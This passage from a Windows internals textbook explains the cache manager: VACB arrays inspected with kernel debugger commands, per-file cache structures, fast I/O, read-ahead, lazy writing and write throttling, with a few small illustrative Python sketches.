fffff800`d05276e4 nt!CcDbgAdditionalPagesQueuedCount = <no type information>
fffff800`d0543370 nt!CcDbgFoundAsyncReadThreadListEmpty = <no type information>
fffff800`d054336c nt!CcDbgNumberOfCcUnmapInactiveViews = <no type information>
fffff800`d05276e0 nt!CcDbgSkippedReductions = <no type information>
fffff800`d0542e04 nt!CcDbgDisableDAX = <no type information>
...
Some systems may show differences in variable names due to 32-bit versus 64-bit imple-
mentations. The exact variable names are irrelevant in this experiment—focus instead on the
methodology that is explained. Using these variables and your knowledge of the VACB array
header data structures, you can use the kernel debugger to list all the VACB array headers.
The CcVacbArrays variable is an array of pointers to VACB array headers, which you dereference
to dump the contents of the _VACB_ARRAY_HEADERs. First, obtain the highest array index:
1: kd> dd nt!CcVacbArraysHighestUsedIndex l1
fffff800`d0529c1c 00000000
And now you can dereference each index until the maximum index. On this system (and this is
the norm), the highest index is 0, which means there’s only one header to dereference:
1: kd> ?? (*((nt!_VACB_ARRAY_HEADER***)@@(nt!CcVacbArrays)))[0]
struct _VACB_ARRAY_HEADER * 0xffffc40d`221cb000
+0x000 VacbArrayIndex : 0
+0x004 MappingCount : 0x302
+0x008 HighestMappedIndex : 0x301
+0x00c Reserved
: 0
If there were more, you could change the array index at the end of the command with a
higher number, until you reach the highest used index. The output shows that the system has
only one VACB array with 770 (0x302) active VACBs.
Finally, the CcNumberOfFreeVacbs variable stores the number of VACBs on the free VACB list.
Dumping this variable on the system used for the experiment results in 2,506 (0x9ca):
1: kd> dd nt!CcNumberOfFreeVacbs l1
fffff800`d0527318 000009ca
As expected, the sum of the free (0x9ca—2,506 decimal) and active VACBs (0x302—770
decimal) on a 64-bit system with one VACB array equals 3,276, the number of VACBs in one VACB
array. If the system were to run out of free VACBs, the cache manager would try to allocate a new
VACB array. Because of the volatile nature of this experiment, your system may create and/or
free additional VACBs between the two steps (dumping the active and then the free VACBs). This
might cause your total of free and active VACBs to not match exactly 3,276. Try quickly repeating
the experiment a couple of times if this happens, although you may never get stable numbers,
especially if there is lots of file system activity on the system.
Per-file cache data structures
Each open handle to a file has a corresponding file object. (File objects are explained in detail in
Chapter 6 of Part 1, “I/O system.”) If the file is cached, the file object points to a private cache map struc-
ture that contains the location of the last two reads so that the cache manager can perform intelligent
read-ahead (described later, in the section “Intelligent read-ahead”). In addition, all the private cache
maps for open instances of a file are linked together.
Each cached file (as opposed to file object) has a shared cache map structure that describes the state
of the cached file, including the partition to which it belongs, its size, and its valid data length. (The
function of the valid data length field is explained in the section “Write-back caching and lazy writing.”)
The shared cache map also points to the section object (maintained by the memory manager and which
describes the file’s mapping into virtual memory), the list of private cache maps associated with that
file, and any VACBs that describe currently mapped views of the file in the system cache. (See Chapter
5 of Part 1 for more about section object pointers.) All the opened shared cache maps for different files
are linked in a global linked list maintained in the cache manager’s partition data structure. The rela-
tionships among these per-file cache data structures are illustrated in Figure 11-8.
FIGURE 11-8 Per-file cache data structures. (The figure shows file objects pointing to private cache maps containing read-ahead information; the private cache maps link to the file's shared cache map, which records the open count, file size, valid data length, and section object pointers, and whose VACB index array entries point to VACBs describing currently mapped views.)
When asked to read from a particular file, the cache manager must determine the answers to
two questions:
1. Is the file in the cache?
2. If so, which VACB, if any, refers to the requested location?
In other words, the cache manager must find out whether a view of the file at the desired address is
mapped into the system cache. If no VACB contains the desired file offset, the requested data isn’t cur-
rently mapped into the system cache.
To keep track of which views for a given file are mapped into the system cache, the cache manager
maintains an array of pointers to VACBs, which is known as the VACB index array. The first entry in the
VACB index array refers to the first 256 KB of the file, the second entry to the second 256 KB, and so
on. The diagram in Figure 11-9 shows four different sections from three different files that are currently
mapped into the system cache.
When a process accesses a particular file in a given location, the cache manager looks in the appro-
priate entry in the file’s VACB index array to see whether the requested data has been mapped into the
cache. If the array entry is nonzero (and hence contains a pointer to a VACB), the area of the file being
referenced is in the cache. The VACB, in turn, points to the location in the system cache where the view
of the file is mapped. If the entry is zero, the cache manager must find a free slot in the system cache
(and therefore a free VACB) to map the required view.
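The lookup itself is simple index arithmetic. The sketch below is a rough model with hypothetical names (the real kernel structures are more involved): dividing the file offset by the 256 KB view size selects the entry, and a zero entry means the view isn't mapped.

```python
VIEW_SIZE = 256 * 1024  # each VACB maps a 256 KB view of a file

def vacb_lookup(vacb_index_array, file_offset):
    """Return the VACB entry covering file_offset, or None if that
    view isn't currently mapped into the system cache (zero entry)."""
    index = file_offset // VIEW_SIZE
    if index >= len(vacb_index_array):
        return None
    return vacb_index_array[index] or None

# A file whose second 256 KB view is the only one cached
# (the pointer value is made up for illustration):
index_array = [0, 0xFFFFC40D221CB000, 0, 0]
```

Here `vacb_lookup(index_array, 300 * 1024)` lands in entry 1 and returns the VACB pointer, while any offset in the first 256 KB returns None.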
As a size optimization, the shared cache map contains a VACB index array that is four entries in size.
Because each VACB describes 256 KB, the entries in this small, fixed-size index array can point to VACB
array entries that together describe a file of up to 1 MB. If a file is larger than 1 MB, a separate VACB index
array is allocated from nonpaged pool, based on the size of the file divided by 256 KB and rounded up
in the case of a remainder. The shared cache map then points to this separate structure.
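The sizing rule can be sketched as follows — a model of the described policy, not actual cache manager code:

```python
VIEW_SIZE = 256 * 1024   # one VACB index entry per 256 KB of file
EMBEDDED_ENTRIES = 4     # the small array inside the shared cache map

def vacb_index_entries(file_size):
    """File size divided by 256 KB, rounded up on a remainder."""
    return (file_size + VIEW_SIZE - 1) // VIEW_SIZE

def needs_separate_index_array(file_size):
    """Files larger than 1 MB (4 x 256 KB) need a VACB index array
    allocated from nonpaged pool instead of the embedded one."""
    return vacb_index_entries(file_size) > EMBEDDED_ENTRIES
```

For example, the 500 KB file A of Figure 11-9 needs two entries and fits the embedded array, while a file of 1 MB plus one byte needs five entries and a separate allocation.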
FIGURE 11-9 VACB index arrays.
As a further optimization, the VACB index array allocated from nonpaged pool becomes a sparse
multilevel index array if the file is larger than 32 MB, where each index array consists of 128 entries. You
can calculate the number of levels required for a file with the following formula:
(Number of bits required to represent file size – 18) / 7
Round up the result of the equation to the next whole number. The value 18 in the equation comes
from the fact that a VACB represents 256 KB, and 256 KB is 2^18. The value 7 comes from the fact that
each level in the array has 128 entries and 2^7 is 128. Thus, a file that has a size that is the maximum that
can be described with 63 bits (the largest size the cache manager supports) would require only seven
levels. The array is sparse because the only branches that the cache manager allocates are ones for
which there are active views at the lowest-level index array. Figure 11-10 shows an example of a multi-
level VACB array for a sparse file that is large enough to require three levels.
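The formula can be checked numerically. The sketch below is an illustration (the floor of one level for small files is an assumption), and it reproduces the worked examples: a 32-GB file needs three levels, and the 63-bit maximum needs seven.

```python
VIEW_SHIFT = 18   # a view is 256 KB = 2**18 bytes
LEVEL_SHIFT = 7   # each index array holds 128 = 2**7 entries

def vacb_index_levels(file_size):
    """ceil((bits required to represent file_size - 18) / 7)."""
    bits = file_size.bit_length()
    levels = -(-(bits - VIEW_SHIFT) // LEVEL_SHIFT)  # ceiling division
    return max(1, levels)
```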
FIGURE 11-10 Multilevel VACB arrays.
This scheme is required to efficiently handle sparse files that might have extremely large file sizes
with only a small fraction of valid data because only enough of the array is allocated to handle the
currently mapped views of a file. For example, a 32-GB sparse file for which only 256 KB is mapped into
the cache’s virtual address space would require a VACB array with three allocated index arrays because
only one branch of the array has a mapping and a 32-GB file requires a three-level array. If the cache
manager didn’t use the multilevel VACB index array optimization for this file, it would have to allocate
a VACB index array with 128,000 entries, or the equivalent of 1,000 VACB index arrays.
File system interfaces
The first time a file’s data is accessed for a cached read or write operation, the file system driver is
responsible for determining whether some part of the file is mapped in the system cache. If it’s not,
the file system driver must call the CcInitializeCacheMap function to set up the per-file data structures
described in the preceding section.
Once a file is set up for cached access, the file system driver calls one of several functions to access
the data in the file. There are three primary methods for accessing cached data, each intended for a
specific situation:
■ The copy method copies user data between cache buffers in system space and a process buffer in user space.
■ The mapping and pinning method uses virtual addresses to read and write data directly from and to cache buffers.
■ The physical memory access method uses physical addresses to read and write data directly from and to cache buffers.
File system drivers must provide two versions of the file read operation—cached and noncached—
to prevent an infinite loop when the memory manager processes a page fault. When the memory
manager resolves a page fault by calling the file system to retrieve data from the file (via the device
driver, of course), it must specify this as a paging read operation by setting the “no cache” and “paging
IO” flags in the IRP.
Figure 11-11 illustrates the typical interactions between the cache manager, the memory man-
ager, and file system drivers in response to user read or write file I/O. The cache manager is invoked
by a file system through the copy interfaces (the CcCopyRead and CcCopyWrite paths). To process a
CcFastCopyRead or CcCopyRead read, for example, the cache manager creates a view in the cache to
map a portion of the file being read and reads the file data into the user buffer by copying from the
view. The copy operation generates page faults as it accesses each previously invalid page in the view,
and in response the memory manager initiates noncached I/O into the file system driver to retrieve the
data corresponding to the part of the file mapped to the page that faulted.
FIGURE 11-11 File system interaction with cache and memory managers.
The next three sections explain these cache access mechanisms, their purpose, and how they’re used.
Copying to and from the cache
Because the system cache is in system space, it’s mapped into the address space of every process. As
with all system space pages, however, cache pages aren’t accessible from user mode because that
would be a potential security hole. (For example, a process might not have the rights to read a file
whose data is currently contained in some part of the system cache.) Thus, user application file reads
and writes to cached files must be serviced by kernel-mode routines that copy data between the
cache’s buffers in system space and the application’s buffers residing in the process address space.
Caching with the mapping and pinning interfaces
Just as user applications read and write data in files on a disk, file system drivers need to read and write
the data that describes the files themselves (the metadata, or volume structure data). Because the file
system drivers run in kernel mode, however, they could, if the cache manager were properly informed,
modify data directly in the system cache. To permit this optimization, the cache manager provides
functions that permit the file system drivers to find where in virtual memory the file system metadata
resides, thus allowing direct modification without the use of intermediary buffers.
If a file system driver needs to read file system metadata in the cache, it calls the cache manager’s
mapping interface to obtain the virtual address of the desired data. The cache manager touches all the
requested pages to bring them into memory and then returns control to the file system driver. The file
system driver can then access the data directly.
If the file system driver needs to modify cache pages, it calls the cache manager’s pinning services,
which keep the pages active in virtual memory so that they can’t be reclaimed. The pages aren’t actu-
ally locked into memory (such as when a device driver locks pages for direct memory access transfers).
Most of the time, a file system driver will mark its metadata stream as no write, which instructs the
memory manager’s mapped page writer (explained in Chapter 5 of Part 1) to not write the pages to
disk until explicitly told to do so. When the file system driver unpins (releases) them, the cache manager
releases its resources so that it can lazily flush any changes to disk and release the cache view that the
metadata occupied.
The mapping and pinning interfaces solve one thorny problem of implementing a file system: buffer
management. Without directly manipulating cached metadata, a file system must predict the maxi-
mum number of buffers it will need when updating a volume’s structure. By allowing the file system to
access and update its metadata directly in the cache, the cache manager eliminates the need for buf-
fers, simply updating the volume structure in the virtual memory the memory manager provides. The
only limitation the file system encounters is the amount of available memory.
Caching with the direct memory access interfaces
In addition to the mapping and pinning interfaces used to access metadata directly in the cache, the
cache manager provides a third interface to cached data: direct memory access (DMA). The DMA
functions are used to read from or write to cache pages without intervening buffers, such as when a
network file system is doing a transfer over the network.
The DMA interface returns to the file system the physical addresses of cached user data (rather than
the virtual addresses, which the mapping and pinning interfaces return), which can then be used to
transfer data directly from physical memory to a network device. Although small amounts of data (1 KB
to 2 KB) can use the usual buffer-based copying interfaces, for larger transfers the DMA interface can
result in significant performance improvements for a network server processing file requests from re-
mote systems. To describe these references to physical memory, a memory descriptor list (MDL) is used.
(MDLs are introduced in Chapter 5 of Part 1.)
Fast I/O
Whenever possible, reads and writes to cached files are handled by a high-speed mechanism named
fast I/O. Fast I/O is a means of reading or writing a cached file without going through the work of
generating an IRP. With fast I/O, the I/O manager calls the file system driver’s fast I/O routine to see
whether I/O can be satisfied directly from the cache manager without generating an IRP.
Because the cache manager is architected on top of the virtual memory subsystem, file system driv-
ers can use the cache manager to access file data simply by copying to or from pages mapped to the
actual file being referenced without going through the overhead of generating an IRP.
Fast I/O doesn’t always occur. For example, the first read or write to a file requires setting up the
file for caching (mapping the file into the cache and setting up the cache data structures, as explained
earlier in the section “Cache data structures”). Also, if the caller specified an asynchronous read or write,
fast I/O isn’t used because the caller might be stalled during paging I/O operations required to satisfy
the buffer copy to or from the system cache and thus not really providing the requested asynchronous
I/O operation. But even on a synchronous I/O operation, the file system driver might decide that it can’t
process the I/O operation by using the fast I/O mechanism—say, for example, if the file in question has
a locked range of bytes (as a result of calls to the Windows LockFile and UnlockFile functions). Because
the cache manager doesn’t know what parts of which files are locked, the file system driver must check
the validity of the read or write, which requires generating an IRP. The decision tree for fast I/O is
shown in Figure 11-12.
These steps are involved in servicing a read or a write with fast I/O:
1. A thread performs a read or write operation.
2. If the file is cached and the I/O is synchronous, the request passes to the fast I/O entry point of the file system driver stack. If the file isn't cached, the file system driver sets up the file for caching so that the next time, fast I/O can be used to satisfy a read or write request.
3. If the file system driver's fast I/O routine determines that fast I/O is possible, it calls the cache manager's read or write routine to access the file data directly in the cache. (If fast I/O isn't possible, the file system driver returns to the I/O system, which then generates an IRP for the I/O and eventually calls the file system's regular read routine.)
4. The cache manager translates the supplied file offset into a virtual address in the cache.
5. For reads, the cache manager copies the data from the cache into the buffer of the process requesting it; for writes, it copies the data from the buffer to the cache.
6. One of the following actions occurs:
• For reads where FILE_FLAG_RANDOM_ACCESS wasn't specified when the file was opened, the read-ahead information in the caller's private cache map is updated. Read-ahead may also be queued for files for which the FO_RANDOM_ACCESS flag is not specified.
• For writes, the dirty bit of any modified page in the cache is set so that the lazy writer will know to flush it to disk.
• For write-through files, any modifications are flushed to disk.
FIGURE 11-12 Fast I/O decision tree.
Read-ahead and write-behind
In this section, you’ll see how the cache manager implements reading and writing file data on behalf of
file system drivers. Keep in mind that the cache manager is involved in file I/O only when a file is opened
without the FILE_FLAG_NO_BUFFERING flag and then read from or written to using the Windows I/O
functions (for example, using the Windows ReadFile and WriteFile functions). Mapped files don’t go
through the cache manager, nor do files opened with the FILE_FLAG_NO_BUFFERING flag set.
Note When an application uses the FILE_FLAG_NO_BUFFERING flag to open a file, its file I/O
must start at device-aligned offsets and be of sizes that are a multiple of the alignment size;
its input and output buffers must also be device-aligned virtual addresses. For file systems,
this usually corresponds to the sector size (4,096 bytes on NTFS, typically, and 2,048 bytes on
CDFS). One of the benefits of the cache manager, apart from the actual caching performance,
is the fact that it performs intermediate buffering to allow arbitrarily aligned and sized I/O.
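The note's alignment rules reduce to a simple check, sketched here; the `alignment` value would come from the actual device or file system, with 4,096 bytes being typical for NTFS.

```python
def unbuffered_io_is_valid(offset, length, buffer_addr, alignment=4096):
    """FILE_FLAG_NO_BUFFERING I/O must use device-aligned offsets,
    transfer sizes that are a multiple of the alignment, and
    device-aligned buffer virtual addresses."""
    return (offset % alignment == 0
            and length % alignment == 0
            and buffer_addr % alignment == 0)
```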
Intelligent read-ahead
The cache manager uses the principle of spatial locality to perform intelligent read-ahead by predicting
what data the calling process is likely to read next based on the data that it’s reading currently. Because
the system cache is based on virtual addresses, which are contiguous for a particular file, it doesn’t
matter whether they’re juxtaposed in physical memory. File read-ahead for logical block caching is
more complex and requires tight cooperation between file system drivers and the block cache because
that cache system is based on the relative positions of the accessed data on the disk, and, of course,
files aren’t necessarily stored contiguously on disk. You can examine read-ahead activity by using the
Cache: Read Aheads/sec performance counter or the CcReadAheadIos system variable.
Reading the next block of a file that is being accessed sequentially provides an obvious performance
improvement, with the disadvantage that it will cause head seeks. To extend read-ahead benefits to
cases of strided data accesses (both forward and backward through a file), the cache manager maintains a history of the last two read requests in the private cache map for the file handle being accessed,
a method known as asynchronous read-ahead with history. If a pattern can be determined from the
caller’s apparently random reads, the cache manager extrapolates it. For example, if the caller reads
page 4,000 and then page 3,000, the cache manager assumes that the next page the caller will require
is page 2,000 and prereads it.
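That extrapolation can be sketched as follows (hypothetical names; the real history lives in the private cache map and feeds the asynchronous read-ahead logic):

```python
def predict_next_offset(prev, last):
    """Extrapolate the next read position from the last two requests,
    assuming a constant stride (forward or backward)."""
    return last + (last - prev)
```

With the book's example, reads at pages 4,000 and 3,000 yield a stride of -1,000 and a prediction of page 2,000.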
Note Although a caller must issue a minimum of three read operations to establish a pre-
dictable sequence, only two are stored in the private cache map.
To make read-ahead even more efficient, the Win32 CreateFile function provides a flag indicating
forward sequential file access: FILE_FLAG_SEQUENTIAL_SCAN. If this flag is set, the cache manager
doesn’t keep a read history for the caller for prediction but instead performs sequential read-ahead.
However, as the file is read into the cache’s working set, the cache manager unmaps views of the file
that are no longer active and, if they are unmodified, directs the memory manager to place the pages
belonging to the unmapped views at the front of the standby list so that they will be quickly reused. It
also reads ahead two times as much data (2 MB instead of 1 MB, for example). As the caller continues
reading, the cache manager prereads additional blocks of data, always staying about one read (of the
size of the current read) ahead of the caller.
The cache manager’s read-ahead is asynchronous because it’s performed in a thread separate
from the caller’s thread and proceeds concurrently with the caller’s execution. When called to re-
trieve cached data, the cache manager first accesses the requested virtual page to satisfy the request
and then queues an additional I/O request to retrieve additional data to a system worker thread. The
worker thread then executes in the background, reading additional data in anticipation of the caller’s
next read request. The preread pages are faulted into memory while the program continues executing
so that when the caller requests the data it’s already in memory.
For applications that have no predictable read pattern, the FILE_FLAG_RANDOM_ACCESS flag can
be specified when the CreateFile function is called. This flag instructs the cache manager not to attempt
to predict where the application is reading next and thus disables read-ahead. The flag also stops the
cache manager from aggressively unmapping views of the file as the file is accessed so as to minimize
the mapping/unmapping activity for the file when the application revisits portions of the file.
Read-ahead enhancements
Windows 8.1 introduced some enhancements to the cache manager read-ahead functionality. File system
drivers and network redirectors can decide the size and growth for the intelligent read-ahead with the
CcSetReadAheadGranularityEx API function. The cache manager client can decide the following:
■ Read-ahead granularity Sets the minimum read-ahead unit size and the end file-offset of the next read-ahead. The cache manager sets the default granularity to 4 KB (the size of a memory page), but every file system sets this value in a different way (NTFS, for example, sets the cache granularity to 64 KB).
Figure 11-13 shows an example of read-ahead on a 200 KB file, where the cache granularity has been set to 64 KB. If the user requests a nonaligned 1 KB read at offset 0x10800, and if a sequential read has already been detected, the intelligent read-ahead will emit an I/O that encompasses the 64 KB of data from offset 0x10000 to 0x20000. If there were already more than two sequential reads, the cache manager emits another supplementary read from offset 0x20000 to offset 0x30000 (192 KB).
FIGURE 11-13 Read-ahead on a 200 KB file, with granularity set to 64 KB.
■ Pipeline size For some remote file system drivers, it may make sense to split large read-ahead I/Os into smaller chunks, which will be emitted in parallel by the cache manager worker threads. A network file system can achieve substantially better throughput using this technique.
■ Read-ahead aggressiveness File system drivers can specify the percentage used by the cache manager to decide how to increase the read-ahead size after the detection of a third sequential read. For example, let's assume that an application is reading a big file using a 1 MB I/O size. After the tenth read, the application has already read 10 MB (the cache manager may have already prefetched some of them). The intelligent read-ahead now decides by how much to grow the read-ahead I/O size. If the file system has specified 60% growth, the formula used is the following:
(Number of sequential reads * Size of last read) * (Growth percentage / 100)
So, this means that the next read-ahead size is 6 MB (instead of being 2 MB, assuming that the
granularity is 64 KB and the I/O size is 1 MB). The default growth percentage is 50% if not modi-
fied by any cache manager client.
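Both behaviors above reduce to small arithmetic. The helpers below model the description under the stated assumptions (64 KB granularity, 50% default growth); they are illustrative sketches, not the actual implementation.

```python
def read_ahead_extent(offset, length, granularity=64 * 1024):
    """Expand a nonaligned read to granularity-aligned boundaries,
    as in the Figure 11-13 example."""
    start = offset - offset % granularity
    end = offset + length
    end += -end % granularity  # round up to the next boundary
    return start, end

def next_read_ahead_size(sequential_reads, last_read_size, growth_pct=50):
    """(Number of sequential reads * size of last read) * (growth % / 100)."""
    return sequential_reads * last_read_size * growth_pct // 100
```

A 1 KB read at offset 0x10800 expands to the 64 KB extent 0x10000–0x20000, and ten sequential 1 MB reads with 60% growth yield a 6 MB next read-ahead.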
Write-back caching and lazy writing
The cache manager implements a write-back cache with lazy write. This means that data written to
files is first stored in memory in cache pages and then written to disk later. Thus, write operations are
allowed to accumulate for a short time and are then flushed to disk all at once, reducing the overall
number of disk I/O operations.
The cache manager must explicitly call the memory manager to flush cache pages because other-
wise the memory manager writes memory contents to disk only when demand for physical memory
exceeds supply, as is appropriate for volatile data. Cached file data, however, represents nonvolatile
disk data. If a process modifies cached data, the user expects the contents to be reflected on disk in a
timely manner.
Additionally, the cache manager has the ability to veto the memory manager’s mapped writer
thread. Since the modified list (see Chapter 5 of Part 1 for more information) is not sorted in logical
block address (LBA) order, the cache manager’s attempts to cluster pages for larger sequential I/Os to
the disk are not always successful and actually cause repeated seeks. To combat this effect, the cache
manager has the ability to aggressively veto the mapped writer thread and stream out writes in virtual
byte offset (VBO) order, which is much closer to the LBA order on disk. Since the cache manager now
owns these writes, it can also apply its own scheduling and throttling algorithms to prefer read-ahead
over write-behind and impact the system less.
The decision about how often to flush the cache is an important one. If the cache is flushed too
frequently, system performance will be slowed by unnecessary I/O. If the cache is flushed too rarely,
you risk losing modified file data in the case of a system failure (a loss especially irritating to users
who know that they asked the application to save the changes) and running out of physical memory
(because it’s being used by an excess of modified pages).
To balance these concerns, the cache manager’s lazy writer scan function executes on a system
worker thread once per second. The lazy writer scan has different duties:
■ Checks the average number of available pages and dirty pages (belonging to the current partition) and updates the bottom and top limits of the dirty page threshold accordingly. The threshold itself is updated too, primarily based on the total number of dirty pages written in the previous cycle (see the following paragraphs for further details). It sleeps if there are no dirty pages to write.
■ Calculates the number of dirty pages to write to disk through the CcCalculatePagesToWrite internal routine. If the number of dirty pages is more than 256 (1 MB of data), the cache manager queues one-eighth of the total dirty pages to be flushed to disk. If the rate at which dirty pages are being produced is greater than the amount the lazy writer had determined it should write, the lazy writer writes an additional number of dirty pages that it calculates are necessary to match that rate.
■ Cycles between each shared cache map (which are stored in a linked list belonging to the current partition) and, using the internal CcShouldLazyWriteCacheMap routine, determines whether the current file described by the shared cache map needs to be flushed to disk. There are different reasons why a file shouldn't be flushed to disk: for example, an I/O could already have been initialized by another thread, the file could be a temporary file, or, more simply, the cache map might not have any dirty pages. If the routine determines that the file should be flushed out, the lazy writer scan checks whether there are still enough available pages to write and, if so, posts a work item to the cache manager system worker threads.
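The second duty can be sketched as follows. This is a simplified model: the real CcCalculatePagesToWrite also accounts for the dirty-page production rate, and the below-threshold behavior here is an assumption.

```python
LAZY_WRITE_THRESHOLD = 256  # dirty pages, i.e. 1 MB of data

def pages_to_queue(dirty_pages):
    """Queue one-eighth of the dirty pages once more than 256
    (1 MB) have accumulated; otherwise write them all (assumed)."""
    if dirty_pages > LAZY_WRITE_THRESHOLD:
        return dirty_pages // 8
    return dirty_pages
```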
Note The lazy writer scan uses some exceptions while deciding the number of dirty pages
mapped by a particular shared cache map to write (it doesn’t always write all the dirty pages
of a file): If the target file is a metadata stream with more than 256 KB of dirty pages, the cache
manager writes only one-eighth of its total pages. Another exception is used for files that have
more dirty pages than the total number of pages that the lazy writer scan can flush.
Lazy writer system worker threads from the systemwide critical worker thread pool actually perform
the I/O operations. The lazy writer is also aware of when the memory manager’s mapped page writer
is already performing a flush. In these cases, it delays its write-back capabilities to the same stream to
avoid a situation where two flushers are writing to the same file.
Note The cache manager provides a means for file system drivers to track when and how
much data has been written to a file. After the lazy writer flushes dirty pages to the disk,
the cache manager notifies the file system, instructing it to update its view of the valid data
length for the file. (The cache manager and file systems separately track in memory the valid
data length for a file.)
EXPERIMENT: Watching the cache manager in action
In this experiment, we use Process Monitor to view the underlying file system activity, including
cache manager read-ahead and write-behind, when Windows Explorer copies a large file (in this
example, a DVD image) from one local directory to another.
First, configure Process Monitor’s filter to include the source and destination file paths, the
Explorer.exe and System processes, and the ReadFile and WriteFile operations. In this example,
the C:\Users\Andrea\Documents\Windows_10_RS3.iso file was copied to C:\ISOs\ Windows_10_
RS3.iso, so the filter is configured as follows:
You should see a Process Monitor trace like the one shown here after you copy the file:
The first few entries show the initial I/O processing performed by the copy engine and the first
cache manager operations. Here are some of the things that you can see:
■ The initial 1 MB cached read from Explorer at the first entry. The size of this read depends on an internal matrix calculation based on the file size and can vary from 128 KB to 1 MB. Because this file was large, the copy engine chose 1 MB.
■ The 1-MB read is followed by another 1-MB noncached read. Noncached reads typically indicate activity due to page faults or cache manager access. A closer look at the stack trace for these events, which you can see by double-clicking an entry and choosing the Stack tab, reveals that indeed the CcCopyRead cache manager routine, which is called by the NTFS driver's read routine, causes the memory manager to fault the source data into physical memory:
■ After this 1-MB page fault I/O, the cache manager's read-ahead mechanism starts reading the file, which includes the System process's subsequent noncached 1-MB read at the 1-MB offset. Because of the file size and Explorer's read I/O sizes, the cache manager chose 1 MB as the optimal read-ahead size. The stack trace for one of the read-ahead operations, shown next, confirms that one of the cache manager's worker threads is performing the read-ahead.
After this point, Explorer’s 1-MB reads aren’t followed by page faults, because the read-ahead
thread stays ahead of Explorer, prefetching the file data with its 1-MB noncached reads. However,
every once in a while, the read-ahead thread is not able to pick up enough data in time, and
clustered page faults do occur, which appear as Synchronous Paging I/O.
If you look at the stack for these entries, you’ll see that instead of MmPrefetchForCacheManager,
the MmAccessFault/MiIssueHardFault routines are called.
As soon as it starts reading, Explorer also starts performing writes to the destination file.
These are sequential, cached 1-MB writes. After about 124 MB of reads, the first WriteFile opera-
tion from the System process occurs, shown here:
The write operation’s stack trace, shown here, indicates that the memory manager’s mapped
page writer thread was actually responsible for the write. This occurs because for the first couple
of megabytes of data, the cache manager hadn’t started performing write-behind, so the
memory manager’s mapped page writer began flushing the modified destination file data. (See
Chapter 10 for more information on the mapped page writer.)
To get a clearer view of the cache manager operations, remove Explorer from the Process
Monitor’s filter so that only the System process operations are visible, as shown next.
With this view, it’s much easier to see the cache manager’s 1-MB write-behind operations
(the maximum write sizes are 1 MB on client versions of Windows and 32 MB on server versions;
this experiment was performed on a client system). The stack trace for one of the write-behind
operations, shown here, verifies that a cache manager worker thread is performing write-behind:
As an added experiment, try repeating this process with a remote copy instead (from one
Windows system to another) and by copying files of varying sizes. You’ll notice some different
behaviors by the copy engine and the cache manager, both on the receiving and sending sides.
Disabling lazy writing for a file
If you create a temporary file by specifying the flag FILE_ATTRIBUTE_TEMPORARY in a call to the
Windows CreateFile function, the lazy writer won’t write dirty pages to the disk unless there is a se-
vere shortage of physical memory or the file is explicitly flushed. This characteristic of the lazy writer
improves system performance—the lazy writer doesn’t immediately write data to a disk that might
ultimately be discarded. Applications usually delete temporary files soon after closing them.
Forcing the cache to write through to disk
Because some applications can’t tolerate even momentary delays between writing a file and seeing
the updates on disk, the cache manager also supports write-through caching on a per-file object basis;
changes are written to disk as soon as they’re made. To turn on write-through caching, set the FILE_
FLAG_WRITE_THROUGH flag in the call to the CreateFile function. Alternatively, a thread can explicitly
flush an open file by using the Windows FlushFileBuffers function when it reaches a point at which the
data needs to be written to disk.
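The interaction of these per-file flags can be summarized as a small decision model. This is a hedged sketch in Python, not Windows code; the function name and return values are ours, and the flags stand in for FILE_FLAG_WRITE_THROUGH and FILE_ATTRIBUTE_TEMPORARY:

```python
# Sketch of when dirty data for a file reaches disk, based on the two flags
# described above (hypothetical model, not the Windows implementation).

def write_policy(write_through, temporary, memory_shortage=False, explicit_flush=False):
    """Return when dirty data for a file is written to disk."""
    if write_through:
        return "immediate"      # changes go to disk as soon as they're made
    if temporary:
        # The lazy writer skips temporary files unless forced.
        return "on-flush" if (memory_shortage or explicit_flush) else "deferred"
    return "lazy"               # normal write-behind by the lazy writer

assert write_policy(write_through=True, temporary=False) == "immediate"
assert write_policy(write_through=False, temporary=True) == "deferred"
assert write_policy(False, True, explicit_flush=True) == "on-flush"
assert write_policy(False, False) == "lazy"
```

A temporary file that is deleted before any flush therefore may never touch the disk at all, which is exactly the performance win the lazy writer is after.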
Flushing mapped files
If the lazy writer must write data to disk from a view that’s also mapped into another process’s address
space, the situation becomes a little more complicated because the cache manager will only know
about the pages it has modified. (Pages modified by another process are known only to that process
because the modified bit in the page table entries for modified pages is kept in the process private
page tables.) To address this situation, the memory manager informs the cache manager when a user
maps a file. When such a file is flushed in the cache (for example, as a result of a call to the Windows
FlushFileBuffers function), the cache manager writes the dirty pages in the cache and then checks to
see whether the file is also mapped by another process. When the cache manager sees that the file is
also mapped by another process, the cache manager then flushes the entire view of the section to write
out pages that the second process might have modified. If a user maps a view of a file that is also open
in the cache, when the view is unmapped, the modified pages are marked as dirty so that when the lazy
writer thread later flushes the view, those dirty pages will be written to disk. This procedure works as
long as the sequence occurs in the following order:
1.
A user unmaps the view.
2.
A process flushes file buffers.
If this sequence isn’t followed, you can’t predict which pages will be written to disk.
EXPERIMENT: Watching cache flushes
You can see the cache manager map views into the system cache and flush pages to disk by
running the Performance Monitor and adding the Data Maps/sec and Lazy Write Flushes/sec
counters. (You can find these counters under the “Cache” group.) Then, copy a large file from one
location to another. The generally higher line in the following screenshot shows Data Maps/sec,
and the other shows Lazy Write Flushes/sec. During the file copy, Lazy Write Flushes/sec signifi-
cantly increased.
Write throttling
The file system and cache manager must determine whether a cached write request will affect sys-
tem performance and then schedule any delayed writes. First, the file system asks the cache manager
whether a certain number of bytes can be written right now without hurting performance by using the
CcCanIWrite function and blocking that write if necessary. For asynchronous I/O, the file system sets up
a callback with the cache manager for automatically writing the bytes when writes are again permitted
by calling CcDeferWrite. Otherwise, it just blocks and waits on CcCanIWrite to continue. Once it’s noti-
fied of an impending write operation, the cache manager determines how many dirty pages are in the
cache and how much physical memory is available. If few physical pages are free, the cache manager
momentarily blocks the file system thread that’s requesting to write data to the cache. The cache man-
ager’s lazy writer flushes some of the dirty pages to disk and then allows the blocked file system thread
to continue. This write throttling prevents system performance from degrading because of a lack of
memory when a file system or network server issues a large write operation.
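The core of the throttling decision can be sketched as a predicate (our simplification; the real routine is CcCanIWrite, and the page-size and threshold values here are illustrative):

```python
# Hedged model of the CcCanIWrite-style check: a cached write is allowed only
# if it keeps the number of dirty pages under the dirty page threshold.

def can_i_write(bytes_to_write, dirty_pages, dirty_page_threshold, page_size=4096):
    pages_needed = -(-bytes_to_write // page_size)   # ceiling division
    return dirty_pages + pages_needed <= dirty_page_threshold

# With a threshold of 1,000 dirty pages:
assert can_i_write(4096 * 10, dirty_pages=500, dirty_page_threshold=1000)       # fits
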